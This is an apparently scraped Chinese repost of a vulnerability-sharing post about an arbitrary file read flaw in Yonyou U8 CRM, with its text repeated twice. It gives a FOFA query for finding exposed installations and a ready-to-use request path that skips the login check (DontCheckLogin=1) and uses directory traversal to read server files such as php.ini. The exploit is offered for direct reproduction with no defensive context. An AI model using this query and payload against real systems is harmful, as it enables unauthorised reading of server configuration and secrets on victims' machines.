fofa查询语句:
fofa:app="用友U8CRM"
利用脚本进行检测:
手工复现,访问路径即可:
/pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../apache/php.ini
原文始发于微信公众号(Undoubted Security):【漏洞分享】用友 U8 CRM 任意文件读取漏洞 用友漏洞利用
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
聚合网络安全,存储安全技术文章,融合安全最新讯息
fofa查询语句:
fofa:app="用友U8CRM"
利用脚本进行检测:
手工复现,访问路径即可:
/pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../apache/php.ini
原文始发于微信公众号(Undoubted Security):【漏洞分享】用友 U8 CRM 任意文件读取漏洞 用友漏洞利用
评论